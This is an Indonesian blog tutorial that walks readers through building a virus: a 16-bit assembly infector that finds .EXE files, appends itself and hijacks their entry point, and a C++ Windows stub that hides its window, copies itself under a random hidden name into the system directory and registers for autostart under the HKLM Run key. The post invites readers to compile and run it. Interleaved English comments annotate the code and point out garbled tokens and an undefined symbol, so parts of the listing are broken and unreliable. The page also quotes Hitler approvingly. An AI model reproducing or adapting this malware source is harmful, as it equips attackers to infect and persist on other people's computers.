
Teknik Injeksi Virus Dengan PE INFECTOR

DEFINISI PE INFEKTOR

hmnnn... sebenarnya PE Infektor adalah sebuah metode yang digunakan untuk menginfeksi suatu

file berekstensi .exe ... yaitu dengan cara menginjeksi file .exe tersebut dengan kode

virus. Jadi ketika file .exe yang terinfeksi dijalankan... maka script virus akan

jalan...wehehehehe...lebih asik kan ...daripada kita menggunakan file virus yang di-

kamuflasekan... sedangkan penularannya ya... sama ajah dari virus - virus yang dijalankan

... program virus tersebut akan menginjeksi file - file yang sehat dan diubah menjadi file

virus.

DIAGRAM PENULARAN



Nah dapat dijelaskan pada diagram penularan si virus ini akan mencari file sehat ..
kemudian akan mencari pada segmen ke berapa file .exe tersebut dapat disisipi kode virus.

PERSIAPAN PEMBUATAN

Untuk pembuatan PE infektor ini, pertama anda harus tahu tentang bahasa mesin, atau

kerennya adalah bahasa assembly. kedua anda harus tahu tentang visual c++ atau bahasa

pemrograman tingkat menengah... entah visual c++ atau borland c++ gak masalah, yang penting

c++ deh. Nah kemudian yang perlu disiapkan lagi ya palingan tau soal registry windows ...

Kita tidak perlu memakai Linker ASM soalnya dalam C++ langsung ada Linker and compiler-nya.

MEMBUAT KODE PE INFEKTOR DARI ASSEMBLY

Ini nihhhhhhh... awalnya kudu tau bahasa assembly dulu kemudian baru menanjak ke bahasa
menengahnya... ntar dijelasin kok... tenang ajah ... okeh!!!!

// Listing 1 (annotated): the infector's 16-bit MASM source inside a C asm()
// statement. Despite the article's title this is not a Win32 PE infector: it
// validates the 'MZ' signature of a 1Ch-byte DOS header and uses INT 21h file
// services, so it targets 16-bit DOS .EXE files only. As transcribed the
// listing contains garbled tokens and an undefined symbol and will not
// assemble as given. The English comments replace the original Indonesian
// annotations, several of which misread immediate operands as memory loads.
asm
(
".SEQ"
"HOSTSEG SEGMENT BYTE"
"ASSUME CS:HOSTSEG,SS:HSTACK"             // segment assumptions for the host stub
"HOST:"                                   // host stub: the minimal program the virus is first attached to
"mov ax,4C00H"                            // ax = 4C00h is an immediate: DOS 4Ch terminate, exit code 0
"int 21H"                                 // DOS function dispatcher
"HOSTSEG ENDS"
"STACKSIZE EQU 100H"                      // EQU defines a constant (256-byte host stack); it is not a comparison

"HSTACK SEGMENT PARA STACK 'STACK'"
"db STACKSIZE dup (?)"
"HSTACK ENDS"

"VSEG SEGMENT PARA"
"ASSUME CS:VSEG,DS:VSEG,SS:HSTACK"

"DTA DB 2BH dup (?)"                      // private Disk Transfer Area for the directory search
"EXE_HDR DB 1CH dup (?)"                  // copy of the victim's 1Ch-byte DOS EXE header
"EXEFILE DB '*.EXE',0"                    // search pattern: every .EXE in the current directory

"HOSTS DW HOSTSEG,STACKSIZE"              // victim's original SS:SP; INFECT overwrites this in the appended copy
"FILLER DW ?"
"HOSTC DW 0,HOSTSEG"                      // victim's original CS:IP; likewise patched by INFECT
"VIRUS:"                                  // virus entry point; an infected file starts executing here
"push ax"                                 // preserve ax for the host
"push cs"
"pop ds"                                  // ds = cs so the code can address its own data
"mov ah,1AH"
"mov dx,OFFSET DTA"
"int 21H"                                 // DOS 1Ah: set the DTA to the private buffer above
"call FINDEXE"                            // search for one infectable .EXE
"jc FINISH"                               // carry set: none found, go straight to the host
"call INFECT"                             // infect the file FINDEXE left open
"FINISH: push es"
"pop ds"
"mov dx,80H"                              // 80h is an immediate: offset of the default DTA in the PSP
"mov ah,1AH"
"int 21H"                                 // DOS 1Ah: restore the default DTA at ES:80h
"pop ax"
"cli"
"mov ss,WORD PTR cs:[HOSTS]"
"mov sp,WORD PTR cs:[HOSTS+2]"            // switch to the host's original stack (interrupts off while ss:sp is inconsistent)
"sti"
"jmp DWORD PTR cs:[HOSTC]"                // far jump to the host's original entry point
"FINDEXE:"                                // DOS 4Eh find-first / 4Fh find-next over *.EXE, filtered by FILE_OK
"mov dx,OFFSET EXEFILE"
"mov cx,3FH"                              // attribute mask: match files regardless of attribute
"mov ah,4EH"
"int 21H"
"NEXTE: jc FEX"                           // no (more) matches: return with carry set
"call FILE_OK"
"jnc FEX"                                 // FILE_OK cleared carry: candidate accepted
"mov ah,4FH"
"int 21H"
"jmp SHORT NEXTE"
"FEX: ret"


Nah baris di bawah ini adalah potongan jika file tersebut adalah .exe maka akan ditulari

atau disisipkan kode virus:

// FILE_OK: open the directory hit (its name sits at DTA+1Eh), read the 1Ch-byte
// header into EXE_HDR and decide whether to infect. Accepts only files that
// carry the 'MZ' signature, have overlay number 0, keep their relocation table
// below offset 40h, have room for NUMRELS more relocation entries (REL_ROOM)
// and whose initial IP is not already OFFSET VIRUS - the re-infection guard,
// which is also the simplest static indicator of an already-infected file.
// Returns carry clear with the handle still open in bx on acceptance;
// otherwise closes the file and returns carry set.
"FILE_OK:"
"mov dx,OFFSET DTA+1EH"
"mov ax,3D02H"                            // DOS 3Dh: open read/write
"int 21H"
"jc OK_END1"                              // open failed: nothing to close
"mov bx,ax"                               // bx = handle for every call that follows
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,3FH"                              // DOS 3Fh: read the 1Ch-byte header
"int 21H"
"jc OK_END"
"cmp WORD PTR [EXE_HDR],'ZM'"             // 'MZ' signature (word-swapped)
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+26],0"             // overlay number must be 0
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+24],40H"           // relocation table offset must be below 40h
"jnc OK_END"
"call REL_ROOM"
"jc OK_END"                               // not enough header space for the new relocation entries
"cmp WORD PTR [EXE_HDR+14H],OFFSET VIRUS" // initial IP already points at VIRUS => already infected
"clc"
"jne OK_END1"                             // not infected: accept (carry clear, file left open)
"OK_END: mov ah,3EH"                      // DOS 3Eh: close, then reject
"int 21H"
"stc"
"OK_END1:ret"

// REL_ROOM: ax = header paragraphs * 16 - 4 * relocation count
//              - relocation table offset, i.e. the free bytes left in the
// header; the CMP sets carry when fewer than 4*NUMRELS remain. NUMRELS is
// referenced here and in INFECT but defined nowhere in this listing.
"REL_ROOM:"
"mov ax,WORD PTR [EXE_HDR+8]"             // header size in paragraphs
"add ax,ax"
"add ax,ax"                               // ax = paragraphs * 4
"sub ax,WORD PTR [EXE_HDR+6]"             // minus relocation count
"add ax,ax"
"add ax,ax"                               // ax = paragraphs * 16 - 4 * count
"sub ax,WORD PTR [EXE_HDR+24]"            // minus relocation table offset
"cmp ax,4*NUMRELS"                        // carry = not enough room
"ret"

Sedangkan baris di bawah ini adalah baris untuk menginfeksi file .exe yang telah ditemukan oleh virus:

// INFECT: append the virus body to the file FILE_OK left open in bx and
// re-point the header at it. Steps visible below: seek to end of file rounded
// up to a 16-byte paragraph (DTA+1Ah/+1Ch hold the size) and write OFFSET
// FINAL bytes of the virus; seek back into the appended copy and overwrite its
// HOSTS/FILLER/HOSTC slots with the victim's own SS, SP, checksum, IP and CS
// taken from the header; rewrite the header with new SS/CS (the paragraph
// where the virus landed), IP = OFFSET VIRUS, SP = OFFSET FINAL + STACKSIZE,
// the new file size and NUMRELS extra relocation entries; write the two
// relocation entries (for the HOSTS and HOSTC segment words); close.
// Observable effects: the file grows by about OFFSET FINAL plus padding, the
// header's initial CS:IP lands in the appended tail, and since nothing here
// restores the file date/time (no DOS 57h call) the modification time changes.
"INFECT:"
"mov cx,WORD PTR [DTA+1CH]"               // cx:dx = file size from the directory entry
"mov dx,WORD PTR [DTA+1AH]"
"or dl,0FH"
"add dx,1"
"adc cx,0"                                // round the size up to the next paragraph
"mov WORD PTR [DTA+1CH],cx"
"mov WORD PTR [DTA+1AH],dx"
"mov ax,4200H"                            // DOS 42h/0: seek to that offset (padded end of file)
"int 21H"

"mov cx,OFFSET FINAL"                     // write the whole virus body ...
"xor dx,dx"                               // ... starting at ds:0 (ds = VSEG)
"mov ah,40H"
"int 21H"

"mov dx,WORD PTR [DTA+1AH]"
"mov cx,WORD PTR [DTA+1CH]"
"add dx,OFFSET HOSTS"                     // seek to the HOSTS slot of the copy just written
"adc cx,0v"                               // (garbled in the transcript)
"mov ax,4200H"
"int 21H"
"mov dx,OFFSET EXE_HDR+14"                // header bytes 14..23: original SS, SP, checksum, IP, CS
"mov cx,10"
"mov ah,40H"
"int 21H"                                 // ... stored into HOSTS/FILLER/HOSTC of the copy

"xor cx,cx"
"xor dx,dx"
"mov ax,4200H"                            // seek to offset 0: the header is rewritten next
"int 21H"

"mov ax,WORD PTR [DTA+1AH]"
"mov dx,WORD PTR [DTA+1CH]"
"mov cx,16"
"div cx"                                  // ax = padded size in paragraphs
"sub ax,WORD PTR [EXE_HDR+8]"             // minus header paragraphs = load-relative segment of the virus
"mov WORD PTR [EXE_HDR+22],ax"            // initial CS
"mov WORD PTR [EXE_HDR+14],ax"            // initial SS
"mov WORD PTR [EXE_HDR+20],OFFSET VIRUS"  // initial IP
"mov WORD PTR [EXE_HDR+16],OFFSET FINAL + STACKSIZE" // initial SP: stack sits just past the virus body

"mov dx,WORD PTR [DTA+1CH]"
"mov ax,WORD PTR [DTA+1AH]"
"add ax,OFFSET FINAL + 200H"
"adc dx,0"
"mov cx,200H"
"div cx"                                  // new size: ax = 512-byte pages, dx = bytes in the last page
"mov WORD PTR [EXE_HDR+4],ax"
"mov WORD PTR [EXE_HDR+2],dx"
"add WORD PTR [EXE_HDR+6],NUMRELS"        // relocation count grows by NUMRELS (undefined in this listing)
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"                                 // write the patched header
"vmov ax,WORD PTR [EXE_HDR+6]"            // (garbled in the transcript)
"dec ax"
"dec ax"
"mov cx,4"
"mul cx"                                  // dx:ax = 4 * (count - 2) ...
"add ax,WORD PTR [EXE_HDR+24]"
"adc dx,0"                                // ... + table offset = position of the two new relocation entries
"mov cx,dx"
"mov dx,ax"
"mov ax,4200H"
"int 21H"

"mov WORD PTR [EXE_HDR],OFFSET HOSTS"     // EXE_HDR reused as scratch: entry 1 = HOSTS segment word
"mov ax,WORD PTR [EXE_HDR+22]"
"mov WORD PTR [EXE_HDR+2],ax"
"mov WORD PTR [EXE_HDR+4],OFFSET HOSTC+2" // entry 2 = HOSTC segment word
"mov WORD PTR [EXE_HDR+6],ax"
"mov cx,8"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"                                 // write both relocation entries
"mov ah,3EH"
"int 21H"                                 // close the victim
"ret"

Nah disini adalah baris yang paling saya suka ... ini adalah baris penutup atau akhir dari baris virus

// FINAL marks the end of the virus body: OFFSET FINAL is the byte count INFECT
// appends. END VIRUS makes VIRUS the entry point of the stand-alone build, so
// the host stub is reached only through the far jump via HOSTC.
"FINAL:"

"VSEG ENDS"

"END VIRUS"
);

SCRIPT VIRUS DENGAN BAHASA MENENGAH (C++)

Ehem .. ehem ... iya neh ... maap kalo nulisnya ada salah ... soalnya gua duduk di sebelah

cewek ... cakep banget .. sihhhhhhhhhh tapi dah ada yang punya ... (PS: Maaf gua bukan

buaya' yah...jadi gak akan nyaplok sebelah gua..:-p)

Ok lanjut ... untuk script virus bahasa menengah ini ... ditulis dengan visual c++, nah

biar jelas coba kita liat scriptnyak satuk persatuk ... key...


untuk membedakan itu script pascal, visual basic dan c++ maka harus ada source code ini,

gunanya adalah untuk mendefinisikan, fungsi yang dipakai ada di file mana aja, contohnya :

#include

maka fungsi yang kita pakai ada di file stdio.h seperti cout, cin atau lainnya...

#include
#include
#include
#include
using namespace std;

nah disini adalah source code untuk memunculkan pesan di komputer, terserah lo lo pade mo

nulis apa ajah...tapi yang jelas yang bermanfaat yah... kayak gini:

char quote[256] = "'we shall not capitulate...no never. We may be destroyed, but if we are,

we shall drag a world with us... a world in flames' - adolf hitler";

ini potongan source code untuk melihat atau memanipulasi windows, maksudnya jendela yang

ada di sistem operasi windows:

// Fragment: WinMain opens here; its body continues in the fragments below and
// is closed only in the complete listing further down. This part builds the
// random lowercase file name (1..20 letters) used for the dropped copy.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{

//start random name
srand(GetTickCount());                    // seed from uptime: a different name on every run
char buf[20] = "";                        // zero-filled so the result is NUL-terminated ...
for(int i=rand()%20;i>=0;i--)             // NOTE(review): ... unless i starts at 19, which fills all 20 bytes and leaves no terminator
buf[i] = 'a' + rand()%26;
//end random name

nah yang satu ni untuk menyembunyikan aplikasi virus dari kejaran penangkap windows atau

fly by threats...tau gak... kalo gak tau... yaaa.. coba tekan ALT+TAB maka akan kelihatan

daftar aplikasi yang ada di windows... ato yang aktif di windows...

//start hide window
SetConsoleTitle("Windows");               // retitle this process's console ...
HWND mainwin = FindWindow(NULL, "Windows");   // ... look it up by title (first top-level window with that title, not necessarily ours) ...
ShowWindow(mainwin, 0);                   // ... and hide it (0 == SW_HIDE)
HKEY hKey;                                // registry handle for the Run-key block below
//end hide window

char sd[255];                             // destination path; only the leading part is ever initialised
char path[MAX_PATH];                      // path of the running image
int Freq = 0;                             // unused
int Duration = 100;                       // unused
bool Forwards = true;                     // unused
bool Backwards = false;                   // unused
int timer = 0;                            // unused
HWND hWin;                                // unused
HMODULE GetModH = GetModuleHandle(0);     // handle of the current executable
GetModuleFileName(GetModH, path, 256);    // NOTE(review): passes 256 rather than sizeof(path) (MAX_PATH)

Nah yang ini untuk menyuntik registry yang ada di windows ... pokoknya untuk memanipulasi

registry lah... contohnya di sini alamat registry yang dimanipulasi adalah :

Software\\Microsoft\\Windows\\CurrentVersion\\Run

//start reg key
// Persistence: copy self into the system directory under the random name,
// hide the file and register it for machine-wide autostart. Indicators: a Run
// value named "Windows" whose data is a hidden .exe with a random 1-20 letter
// lowercase name in the system directory, joined with "//" rather than "\".
GetSystemDirectory(sd,255);               // typically the system32 directory; the copy below needs write access there
char fslash[260] = "//";//added           // two forward slashes, not a backslash: the path should still resolve but reads ...system32//xxxx.exe
strcat(sd,fslash);
strcat(sd,buf);
strcat(sd,".exe");
CopyFile(path,sd,FALSE);                  // copy self to the system directory; return value unchecked
SetFileAttributes(sd,FILE_ATTRIBUTE_HIDDEN);//makes file hidden
RegOpenKeyEx(

HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKe

y );                                      // HKLM Run: needs administrative rights; failure is not checked (the call is line-wrapped in this transcript)
RegSetValueEx(hKey, "Windows",0,REG_SZ,(const unsigned char*)sd,sizeof(sd)); // sizeof(sd) stores all 255 bytes: the path plus uninitialised stack bytes after its NUL
RegCloseKey(hKey);
//end reg key



MERANGKAI KODE VIRUS

nah untuk merangkainya ... coba tulis script ini pada visual c++ kemudian dicompile dan jalankan ... okeh ...just take a look :

//need to learn mutex so virus doesnt run twice
#include
#include
#include
#include
using namespace std;

char quote[256] = "'we shall not capitulate...no never. We may be destroyed, but if we are, we shall drag a world with us... a world in flames' - adolf hitler"; // never referenced by WinMain below; a fixed string like this is exactly what a static signature keys on

// WinMain: a Win32 persistence stub with the DOS infector listing embedded as
// inline assembly. What actually executes is the C++ part: hide the console,
// copy the running image to the system directory under a random hidden name
// and register it under HKLM\...\Run. The asm() block cannot contribute
// anything here: MSVC does not implement the `asm` keyword (its inline
// assembler is `__asm { }`), GCC would treat these adjacent string literals as
// one AT&T-syntax line full of MASM directives, and 16-bit DOS INT 21h code
// cannot run inside a Win32 process in any case.
// Indicators a defender can key on: a Run value named "Windows" pointing at a
// hidden .exe with a random 1-20 letter lowercase name in the system
// directory, written with a "//" separator in the path.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
//start random name
srand(GetTickCount());                    // seed from uptime: a different name on every run
char buf[20] = "";                        // zero-filled so the result is NUL-terminated ...
for(int i=rand()%20;i>=0;i--)             // NOTE(review): ... unless i starts at 19, which fills all 20 bytes and leaves no terminator
buf[i] = 'a' + rand()%26;
//end random name

//start hide window
SetConsoleTitle("Windows");               // retitle this process's console ...
HWND mainwin = FindWindow(NULL, "Windows");   // ... look it up by title (first top-level window with that title, not necessarily ours) ...
ShowWindow(mainwin, 0);                   // ... and hide it (0 == SW_HIDE)
HKEY hKey;                                // registry handle for the Run-key block below
//end hide window

char sd[255];                             // destination path; only the leading part is ever initialised
char path[MAX_PATH];                      // path of the running image
int Freq = 0;                             // unused
int Duration = 100;                       // unused
bool Forwards = true;                     // unused
bool Backwards = false;                   // unused
int timer = 0;                            // unused
HWND hWin;                                // unused
HMODULE GetModH = GetModuleHandle(0);     // handle of the current executable
GetModuleFileName(GetModH, path, 256);    // NOTE(review): passes 256 rather than sizeof(path) (MAX_PATH)

//start reg key
GetSystemDirectory(sd,255);               // typically the system32 directory; the copy below needs write access there
char fslash[260] = "//";//added           // two forward slashes, not a backslash: the path should still resolve but reads ...system32//xxxx.exe
strcat(sd,fslash);
strcat(sd,buf);
strcat(sd,".exe");
CopyFile(path,sd,FALSE);                  // copy self to the system directory; return value unchecked
SetFileAttributes(sd,FILE_ATTRIBUTE_HIDDEN);//makes file hidden
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey ); // HKLM Run: needs administrative rights; failure is not checked
RegSetValueEx(hKey, "Windows",0,REG_SZ,(const unsigned char*)sd,sizeof(sd)); // sizeof(sd) stores all 255 bytes: the path plus uninitialised stack bytes after its NUL
RegCloseKey(hKey);
//end reg key

//start ASM code
// 16-bit MASM listing of a DOS .EXE appending infector (checks the 'MZ'
// signature of a 1Ch-byte DOS header, uses INT 21h file services). It is not
// PE-aware, and as transcribed it contains garbled tokens and references
// NUMRELS without ever defining it, so it does not assemble as given.
asm
(
".SEQ"
"HOSTSEG SEGMENT BYTE"
"ASSUME CS:HOSTSEG,SS:HSTACK"
"HOST:"                                   // host stub: minimal program the virus is first attached to
"mov ax,4C00H"                            // DOS 4Ch terminate, exit code 0 (immediate operand)
"int 21H"
"HOSTSEG ENDS"
"STACKSIZE EQU 100H"                      // constant: 256-byte host stack

"HSTACK SEGMENT PARA STACK 'STACK'"
"db STACKSIZE dup (?)"
"HSTACK ENDS"

"VSEG SEGMENT PARA"
"ASSUME CS:VSEG,DS:VSEG,SS:HSTACK"

"DTA DB 2BH dup (?)"                      // private Disk Transfer Area for the directory search
"EXE_HDR DB 1CH dup (?)"                  // copy of the victim's 1Ch-byte DOS EXE header
"EXEFILE DB '*.EXE',0"                    // search pattern

"HOSTS DW HOSTSEG,STACKSIZE"              // victim's original SS:SP, patched by INFECT in the appended copy
"FILLER DW ?"
"HOSTC DW 0,HOSTSEG"                      // victim's original CS:IP, likewise patched
"VIRUS:"                                  // entry point of an infected file
"push ax"
"push cs"
"pop ds"                                  // ds = cs: address own data
"mov ah,1AH"
"mov dx,OFFSET DTA"
"int 21H"                                 // DOS 1Ah: set DTA to the private buffer
"call FINDEXE"                            // find one infectable .EXE (left open in bx)
"jc FINISH"                               // none found
"call INFECT"
"FINISH: push es"
"pop ds"
"mov dx,80H"                              // immediate: default DTA offset in the PSP
"mov ah,1AH"
"int 21H"                                 // restore the default DTA
"pop ax"
"cli"
"mov ss,WORD PTR cs:[HOSTS]"
"mov sp,WORD PTR cs:[HOSTS+2]"            // host's original stack
"sti"
"jmp DWORD PTR cs:[HOSTC]"                // far jump to the host's original entry point
"FINDEXE:"                                // DOS 4Eh find-first / 4Fh find-next over *.EXE, filtered by FILE_OK
"mov dx,OFFSET EXEFILE"
"mov cx,3FH"                              // attribute mask: any attribute
"mov ah,4EH"
"int 21H"
"NEXTE: jc FEX"                           // no (more) matches: carry set
"call FILE_OK"
"jnc FEX"                                 // accepted
"mov ah,4FH"
"int 21H"
"jmp SHORT NEXTE"
"FEX: ret"

// FILE_OK: open the hit, read its header and accept it only if it has the 'MZ'
// signature, overlay number 0, relocation table below 40h, room for NUMRELS
// more relocation entries and an initial IP that is not already OFFSET VIRUS
// (re-infection guard - also the simplest static indicator of infection).
// Carry clear + handle open in bx on acceptance; close + carry set otherwise.
"FILE_OK:"
"mov dx,OFFSET DTA+1EH"
"mov ax,3D02H"                            // DOS 3Dh: open read/write
"int 21H"
"jc OK_END1"
"mov bx,ax"                               // bx = handle
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,3FH"                              // DOS 3Fh: read 1Ch header bytes
"int 21H"
"jc OK_END"
"cmp WORD PTR [EXE_HDR],'ZM'"             // 'MZ' signature
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+26],0"             // overlay number
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+24],40H"           // relocation table offset
"jnc OK_END"
"call REL_ROOM"
"jc OK_END"
"cmp WORD PTR [EXE_HDR+14H],OFFSET VIRUS" // initial IP == VIRUS => already infected
"clc"
"jne OK_END1"
"OK_END: mov ah,3EH"                      // DOS 3Eh: close, reject
"int 21H"
"stc"
"OK_END1:ret"

// REL_ROOM: ax = free header bytes (paragraphs*16 - 4*count - table offset);
// carry set when fewer than 4*NUMRELS remain.
"REL_ROOM:"
"mov ax,WORD PTR [EXE_HDR+8]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+6]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+24]"
"cmp ax,4*NUMRELS"
"ret"

// INFECT: seek to the paragraph-rounded end of the victim and append OFFSET
// FINAL bytes of the virus; copy the victim's original SS, SP, checksum, IP, CS
// from the header into the HOSTS/FILLER/HOSTC slots of the appended copy;
// rewrite the header (SS/CS = paragraph where the virus landed, IP = VIRUS,
// SP = FINAL + STACKSIZE, new size, +NUMRELS relocations); write two relocation
// entries for the HOSTS and HOSTC segment words; close. On disk: size grows by
// about OFFSET FINAL plus padding, initial CS:IP moves into the tail, and the
// modification time changes because the date/time is never restored.
"INFECT:"
"mov cx,WORD PTR [DTA+1CH]"               // cx:dx = file size from the directory entry
"mov dx,WORD PTR [DTA+1AH]"
"or dl,0FH"
"add dx,1"
"adc cx,0"                                // round up to a paragraph
"mov WORD PTR [DTA+1CH],cx"
"mov WORD PTR [DTA+1AH],dx"
"mov ax,4200H"                            // DOS 42h/0: seek
"int 21H"

"mov cx,OFFSET FINAL"                     // write the virus body from ds:0
"xor dx,dx"
"mov ah,40H"
"int 21H"

"mov dx,WORD PTR [DTA+1AH]"
"mov cx,WORD PTR [DTA+1CH]"
"add dx,OFFSET HOSTS"                     // seek to HOSTS in the appended copy
"adc cx,0v"                               // (garbled in the transcript)
"mov ax,4200H"
"int 21H"
"mov dx,OFFSET EXE_HDR+14"                // header bytes 14..23: SS, SP, checksum, IP, CS
"mov cx,10"
"mov ah,40H"
"int 21H"

"xor cx,cx"
"xor dx,dx"
"mov ax,4200H"                            // seek to offset 0
"int 21H"

"mov ax,WORD PTR [DTA+1AH]"
"mov dx,WORD PTR [DTA+1CH]"
"mov cx,16"
"div cx"                                  // padded size in paragraphs
"sub ax,WORD PTR [EXE_HDR+8]"             // minus header paragraphs
"mov WORD PTR [EXE_HDR+22],ax"            // initial CS
"mov WORD PTR [EXE_HDR+14],ax"            // initial SS
"mov WORD PTR [EXE_HDR+20],OFFSET VIRUS"  // initial IP
"mov WORD PTR [EXE_HDR+16],OFFSET FINAL + STACKSIZE" // initial SP

"mov dx,WORD PTR [DTA+1CH]"
"mov ax,WORD PTR [DTA+1AH]"
"add ax,OFFSET FINAL + 200H"
"adc dx,0"
"mov cx,200H"
"div cx"                                  // ax = 512-byte pages, dx = bytes in last page
"mov WORD PTR [EXE_HDR+4],ax"
"mov WORD PTR [EXE_HDR+2],dx"
"add WORD PTR [EXE_HDR+6],NUMRELS"        // NUMRELS is undefined in this listing
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"                                 // write the patched header
"vmov ax,WORD PTR [EXE_HDR+6]"            // (garbled in the transcript)
"dec ax"
"dec ax"
"mov cx,4"
"mul cx"                                  // dx:ax = 4 * (count - 2)
"add ax,WORD PTR [EXE_HDR+24]"
"adc dx,0"                                // + table offset = where the two new entries go
"mov cx,dx"
"mov dx,ax"
"mov ax,4200H"
"int 21H"

"mov WORD PTR [EXE_HDR],OFFSET HOSTS"     // EXE_HDR reused as scratch for the two entries
"mov ax,WORD PTR [EXE_HDR+22]"
"mov WORD PTR [EXE_HDR+2],ax"
"mov WORD PTR [EXE_HDR+4],OFFSET HOSTC+2"
"mov WORD PTR [EXE_HDR+6],ax"
"mov cx,8"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"                                 // write both relocation entries
"mov ah,3EH"
"int 21H"                                 // close the victim
"ret"

"FINAL:"                                  // end of the virus body; OFFSET FINAL = bytes appended

"VSEG ENDS"

"END VIRUS"                               // VIRUS is the entry point of the stand-alone build
);
//end ASM code
return 0;
}
(c) virologi

1 komentar:

Anonim mengatakan... @ 6 Agustus 2010 pukul 12.54

Assalamualaikum. Mas itu kok di bagian
#include
tidak ada file yang disertakan sih. Tolong diperbaiki lagi untuk artikel yang lebih baik. Terima Kasih.
